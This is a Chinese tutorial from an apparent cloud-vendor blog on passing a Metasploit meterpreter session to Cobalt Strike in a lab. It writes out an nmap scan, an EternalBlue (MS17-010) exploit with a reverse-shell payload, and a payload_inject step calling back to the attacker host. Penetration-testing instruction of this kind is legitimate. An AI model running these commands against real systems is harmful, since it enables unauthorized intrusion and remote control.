您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進行MSF和CobaltStrike聯動,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
攻擊機:192.168.60.129 (kali)
受害機:192.168.60.131
網關:192.168.60.2
工具:nmap、metaspolit、cobaltstrike
首先部署受害主機調制網卡可以互相通信。
接下來部署web應用服務,搞的看起來像是真實的應用服務器一樣哈
通過使用nmap信息收集發現開放端口445、3389及操作系統版本信息。
nmap -A 192.168.60.131
通過信息收集發現系統開放445端口,使用工具檢測是否存在ms17_010漏洞,發現存在。
接近著神器1 Metaspolit上場
首先打開msf,進行漏洞利用
1.搜索利用漏洞模塊
search ms17_010
2.漏洞利用
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOST 192.168.60.131 set LHOST 192.168.60.129
獲得session
進入meterpreter會話。
接近著神器2Cobaltstrike上場
如果覺得功能太少,也可以和Cobaltstrike聯動
啟動Cobaltstrike
現在獲得是一個MSF的meterpreter類型的session,且session id為1
在Cobaltstrike新建一個監聽,配置如下:
在MSF中設置如下
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.60.129 set lport 12388 set session 1
exploit
這樣就可以看到在Cobaltstrike中獲取到了了MSF彈回的Meterpreter會話。
最后可以使用Cobaltstrike中集成的滲透模塊進行進一步的測試。
注:只有Meterpreter類型的session才能派生給Cobaltstrike。
上述內容就是如何進行MSF和CobaltStrike聯動,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。